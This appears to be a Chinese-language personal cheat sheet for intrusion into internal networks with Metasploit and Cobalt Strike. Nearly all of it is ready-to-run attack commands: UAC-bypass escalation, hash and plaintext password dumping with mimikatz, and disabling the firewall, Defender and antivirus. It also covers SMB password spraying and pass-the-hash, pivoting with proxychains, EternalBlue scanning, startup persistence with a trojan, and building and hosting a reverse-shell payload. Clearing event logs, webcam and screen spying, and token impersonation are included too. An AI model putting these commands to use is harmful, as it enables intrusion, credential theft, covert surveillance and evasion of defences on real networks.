[系统运维]msf代理进内网

思路：拿到shell之后先获取最高权限，方法uac绕过提权

然后获取hash，以后用于批量撞库啥的

解决shell内乱码:chcp 65001（在cmd内输入，需要在旧版本的kali输入命令界面的编辑，首选项，编码里改成gbk，新版的没找到改编码的地方，有大佬知道的教教我吧）

msf内网穿透进公网，cs传shell给msf

1.msf内网穿透进公网，cs传给msf shell

linux： ./frpc -f *******85a82:1454793

windows：frpc_windows_amd64.exe -f *********885a82:1518179

前面是用户id，后面是隧道id
我这里用的是樱花：https://www.natfrp.com，隧道自己创建

cs传msf里面名字就随便写就行了，host写穿透的域名，端口写穿透的端口，之前自己定义一万多那个14678

提权

UAC 权限提升systeam

提权模块：
exploit/windows/local/bupasuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

win7提权漏洞： use post/multi/recon/local_exploit_suggester

有这些提权的可以试试：ms16-075 ，ms16016，ms16032, ms15051, ms14058, ms10_015

详情：https://blog.csdn.net/qq_17204441/article/details/89063097

run post/windows/gather/enum_patches 查看主机打了哪些补丁，有哪些漏洞模块不能使用了

msf获取hash密码

hashdump 需要system权限

run post/windows/gather/hashdump 权限要求较低，建议使用

run post/windows/gather/smart_hashdump 这个更详细，检查系统和权限，域，hash，自动getsystem

或者：
load mimikatz

msv 列出用户名密码hash
wdigest 跟上个差不多，可以直接获取明文密码
kerberos 一样，管理员在线或者没有注销下获取明文

mimikatz_command -f a:: 帮助

关闭防火墙杀软

netsh advfirewall set allprofiles state off 关闭防火墙

net stop windefend 关闭windows自带杀软 defend

Bcdedit.exe /set {current} nx Alwaysoff 关闭DEP

run killav
run post/windows/manage/killav 关闭杀毒软件

开启远程端口：run post/windows/manage/enable_rdp
或者run getgui -e
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

内网密码撞库

use auxiliary/scanner/smb/smb_login
set rhost 192.168.0.1-255 设置ip段
set smbuser admin 设置账号
set smbpass 123456 设置密码
set verbose false
run

或者hash撞库：
use exploit/windows/smb/psexec
set rhost 192.168.0.1-255
set smbuser admin
set smbpass hash值
set payload windows/meterpreter/revser_tcp
set lhost 监听ip，kali
set lpost 监听端口
exploit

msf代理扫内网

run autoroute -s 192.168.2.0/24 添加动态路由，最简单好用
run autoroute -p 查看路由信息是否成功
route 查看路由信息

或者其他方法：
route add xxx.xxx.xxx.xxx 255.255.255.0 1 这里的1应该是session的id
route print 查看代理，详情：https://www.jozxing.cc/archives/1102

全局代理，让其他工具也能用：
use auxiliary/server/socks4a 这里srvhost设置kali的ip
vim /etc/proxychains.conf 这里设置kali的ip，端口默认1080
之后就用proxychaina4 nmap -T4 -sS -A 要扫的ip
多层代理就往后继续加，继续改vim，端口要不一样如1081

扫内网：
直接meterpreter运行：run post/windows/gather/arp_scanner rhosts=192.168.1.1/24
同理扫描模块
use post/windows/gather/arp_scanner
set SESSION 1
set RHOSTS 192.168.1.120-125
run

use auxiliary/scanner/portscan/tcp 扫描端口
set rhosts 要扫描的ip
set ports 1-1000 或者输入指定端口：135.114.445.6666 中间用点隔开
set threads 20
run

使用auxiliary/scanner/smb/smb_version模块扫描一下各网段的smb服务
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.1.1/24
set threads 10
run

扫描永恒之蓝存在
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.10.0/24
set thread 20
run
然后再逐个ip打，减小流量
use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.10.18
set command whoami
run

portfwd add -l 6666 -p 3389 -r 127.0.0.1 把目标机的3389端口代理到本地6666，可直接远程本地登录目标

权限维持

run metsvc -A 通过服务启动，可能不太好使

schtasks /create /TN cs /s 192.168.0.1 /TR C:\artifact.exe /SC ONSTART /RU system /f 设置计划任务
/TN 指定任务名称 /TR 指定木马文件 /SC ONSTART 任务在每次系统启动的时候运行 /RU 设置指定运行用户权限 /f阻止确认消息。
详情：https://www.cnblogs.com/lostyue/archive/2011/10/24/2223166.html

msf基础命令，信息收集

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.120 lport=4444 -f exe >/home/shell.exe 生成木马
cp shell.exe /var/www/html/ 复制到网站目录
service apache2 start 启动apaache，使网站可以运行，下载木马

查看有没有域：net config workstation ， shell systemnifo
net user /domain ： 查看域用户
net view /domain : 查看有几个域
net view /domain :xxx 查看域内主机
net group /domain : 查看域里面的组
net group “domain computers” /domain 查看域内所有的主机名
net group "domain admins " /domain 查看域管理员
net group “domain controllers” /domain 查看域控制器
net group “enterprise admins” /domain 查看企业管理器
net time /domain 查看时间服务器

ping 域控的主机名得到他们的 IP
例如： ping WIN-LGSVLVH2VHB

ipc$ ：
https://mp.weixin.qq.com/s/_twJsiZ1cGwZ9DlBDX6WrQ
net use \\ipc$ password /user:username
net use //查看当前主机所建立的连接
dir \192.168.52.138\c$
net use z: \ip\c$ password /user:Administrator //把目标C盘映射到本地z盘(未建立ipc连接的情况下)
net use z: \ip\c$ //把目标C盘映射到本地z盘(已建立ipc连接的情况下)

pwd或getwd 目标主机当前处于哪个目录
getlwd 自己处于哪个目录
search -f *.txt -d c:\ 搜索c盘下所有txt文件
download c:\test.txt /root 下载到本机
upload /root/text.txt c: 上传
返回命令：background
查看所有会话命令：sessions -l
clearev : 清理痕迹
download :将目标文件下载到本地
upload:上传至目标当前目录 ：upload 1.exe
execute:在目标执行命令的功能 隐藏执行：execute -f 目标.exe -H
ps : 列出目标进程
getuid： 查看当前用户的身份
getprivs:查看当前权限
migrate ：进程迁移
getpid :查看木马进程
getsystem:尝试提权
run hashdump ：到处目标机的密码
run post/windows/wlan/wlan_profile ：查看wifi密码
run vnc：实时屏幕监控
run webcam ：开启一个摄像头
webcam_stream 开启直播模式

不太重要：

run post/windows/gather/enum_shares 查看主机开了哪些共享文件，获取浏览器历史啥的
run post/windows/gather/checkvm 查看目标是否允许在虚拟机

身份伪造：
load incognito 加载这个工具
list_tokens 列出当前token -u列出所有用户，-g列出组

impersonate_token 伪造要伪造的token，用户要加2个\ 防止转译后报错